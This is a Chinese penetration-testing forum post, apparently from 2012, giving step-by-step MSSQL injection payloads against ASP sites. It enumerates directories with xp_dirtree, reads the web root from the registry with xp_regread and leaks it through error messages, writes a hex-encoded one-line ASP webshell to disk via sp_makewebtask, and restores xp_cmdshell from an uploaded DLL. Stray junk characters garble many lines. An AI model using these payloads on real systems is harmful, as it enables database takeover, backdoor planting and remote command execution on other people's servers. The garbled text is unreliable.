找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsqlL注入取得网站路径最好的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2139|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test'& S) [6 y# j9 ?+ [2 h
假设我们在test里有两个文件夹test1和test2在test1里又有test3: ]# Y0 x$ n# o( R4 d% Z( n
结果显示( [; P; S9 T) f- b$ x

  T5 H) Y0 X5 ]* P  @subdirectory depth2 F' D& _5 C8 N0 e/ W5 ^
test1 1
" h$ W" S# }" e) s  o! D$ u+ B  r+ d9 Rtest3 2
. h8 J0 a- i! B- p& `7 J8 Dtest2 1
+ e. w! `6 j, r$ X: ?3 H- d/ |# \) P7 N1 |0 e
哈哈发现没有那个depth就是目录的级数+ q, \3 i& P! J5 J
ok了,知道怎么办了吧
4 C, g! b" x9 H* l5 e4 F
$ b5 ^! u2 b' _( Ahttp://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- 2 f, j4 Y8 d/ ?  w! t  `( T
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- + N% ^! M6 S7 c/ _7 Y
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
$ F% ~5 _$ M7 t3 D5 l& i3 [
# x- R- [8 V2 F; z% }/ S% D; k只要加上id=1,就是第一级目录 。) K4 v; F8 j( J3 l; M, q4 e& }1 v

9 c" U: Z- g8 V7 i' P! i
) R* ^! q% A9 {! N% [" V! R通过注册表读网站路径:3 R3 c+ V% [5 I/ v7 C

, ^' @0 d; L3 W8 U, L3 w8 `1.;create table [dbo].[cyfd] ([gyfd][char](255));
  |9 E6 v6 d9 E0 s
5 v, i( p0 c: u6 @' K7 B2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--$ G: F+ B! Q1 A! i8 g) J
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--& o9 A$ [0 |/ ~$ \
4 I8 M( D1 f' }- I+ S
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
; k, }; c" }1 E+ u9 W# e/ D% E% y9 V, |and 1=(select count(*) from cyfd where gyfd > 1)
! X6 M( @4 X) ]- ]- m这样IE报错,就把刚才插进去的Web路径的值报出来了
+ B3 _* Q) a# l* S% @1 z9 X* _' q5 ?5 k' a1 w1 s7 V( E0 _: b7 \/ r
4.drop table cyfd;-- 删除临时表* Q& N3 w* O( k8 r4 G+ l
/ h6 ]" l% `4 [4 s# k
获得webshell方法:5 l3 f1 G8 l# H$ F- L8 M9 J
1.create table cmd (a image)-- \**cmd是创建的临时表$ E, K8 }: l1 u& C8 V) Q( v: C# }8 W' R
" s" ^3 j1 b7 W- f. x1 E) M1 z! b. m. R
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
- [( P  q0 L: A9 `# q: _  e" x" P. u( z
) T' u7 ?" i2 \% d/ W
# _. d  T6 ?) _9 b! J3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'7 M1 X$ z* m) ~2 R# Y! E, G% N# N# V2 e' ]
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
, E0 w  ~1 Y/ X0 b
5 O+ M" A* J  i3 M' o% R! Z4.drop table cmd;-- 删除cmd临时表
+ t/ p7 k  }$ X8 x
5 y( Z9 z1 }" E3 d6 v- p+ c恢复xp_cmdshell方法之一:
' i) ~5 @" Q/ Y8 B4 n我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
$ e/ p" m+ ]' _" c0 I" s5 S9 zhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'$ V9 M$ R1 s) V: B7 Q6 r- K5 w" f
恢复,支持绝对路径的恢复哦。:)5 E8 Z$ E8 D! \/ O2 d: M/ A8 t% r- H* [
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表